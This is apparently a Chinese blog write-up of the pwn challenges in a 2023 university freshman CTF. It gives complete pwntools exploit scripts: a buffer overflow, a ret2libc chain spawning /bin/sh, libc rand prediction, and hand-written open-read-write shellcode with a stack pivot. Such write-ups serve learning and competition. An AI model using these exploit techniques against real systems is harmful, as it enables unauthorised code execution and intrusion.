序
海大新生赛,师傅们出题(pwn)确实很简单,没有ak我自己也不理解,反正最后一题本地确实通了🥹🥹🥹
最后附赠一道还有2分钟比赛结束的时候被我无意间玩出来的web题
EASY PWN
确实easy,啥也不用干,强行覆盖就行:
from pwn import *
p = process('./easypwn')
# p = remote('node6.anna.nssctf.cn', 28171)
payload = b'a' * 0x1f
p.sendline(payload)
p.interactive()Shellcode
看见nx保护了,直接无脑ret2libc
from pwn import *
# p = process('./shellcode')
p = remote('node4.anna.nssctf.cn', 28510)
elf = ELF('./shellcode')
lib = ELF('./libc6_2.27-3ubuntu1_amd64.so')
pop_rdi = 0x00000000004007b3
ret_addr = 0x000000000040028e
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = elf.sym['main']
p.sendline(b'aaaa')
payload = b'a' * (0xa + 0x8) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
p.sendline(payload)
puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\00'))
print(hex(puts_addr))
base_addr = puts_addr - lib.sym['puts']
print(hex(base_addr))
system_addr = base_addr + lib.sym['system']
binsh_addr = base_addr + next(lib.search(b'/bin/sh'))
p.sendline(b'aaaa')
payload = b'a' * (0xa + 0x8) + p64(ret_addr) + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr)
p.sendline(payload)
p.interactive()
真男人下120层
套了一堆随机数,本身没什么难度
from pwn import *
from ctypes import *
# p = process('./bin')
p = remote('node5.anna.nssctf.cn', 28986)
elf = ELF('./bin')
libc = cdll.LoadLibrary('./libc6_2.27-3ubuntu1_amd64.so')
libc.srand(libc.time(0))
v4 = libc.rand()
libc.srand(v4 % 3 - 1522127470)
[p.sendline(str(libc.rand() % 4 + 1)) for i in range(120)]
p.interactive()
Random
名叫随机数,实际上是一个开了沙盒的shellcode,栈迁移了一下写入orw的shellcode,第一次自己码了一部分shellcode,可惜远程没通:
from pwn import *
from ctypes import *
context(arch='amd64')
p = process('./RANDOM')
# p = remote('node6.anna.nssctf.cn', 28599)
elf = ELF('./RANDOM')
libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
libc.srand(libc.time(0))
p.sendline(str(libc.rand() % 50))
haha_addr = 0x40094A
shellcode1 = asm('''
mov edx,0x67616c66
push rdx
mov rdi,rsp
mov eax,2
syscall
mov edi,eax
mov rsi,rsp
xor eax,eax
syscall
xor edi,2
mov eax,edi
syscall
''')
shellcode2 = asm("""
xor esi,esi
sub rsp,0x28
jmp rsp
""")
print(len(shellcode1))
print(len(shellcode2))
payload = shellcode1 + shellcode2 + p64(haha_addr)
p.sendline(payload)
p.interactive()
hate eat snake
一个web题,太有意思了,因为RANDOM很生气的博主要挑战60s,然后显然手残的博主做不到,但是博主惊喜发现,贪吃蛇寄了之后,放在那里也会记时,然后就死等60s捡了个flag🥵🤗💥💖
- THE END -
最后修改:2023年7月30日
非特殊说明,本博所有文章均为博主原创。
如若转载,请注明出处:https://he.tld1027.com/2023/04/16/gdou2023-pwn%e9%83%a8%e5%88%86wp/
川公网安备 51070302110564号
共有 0 条评论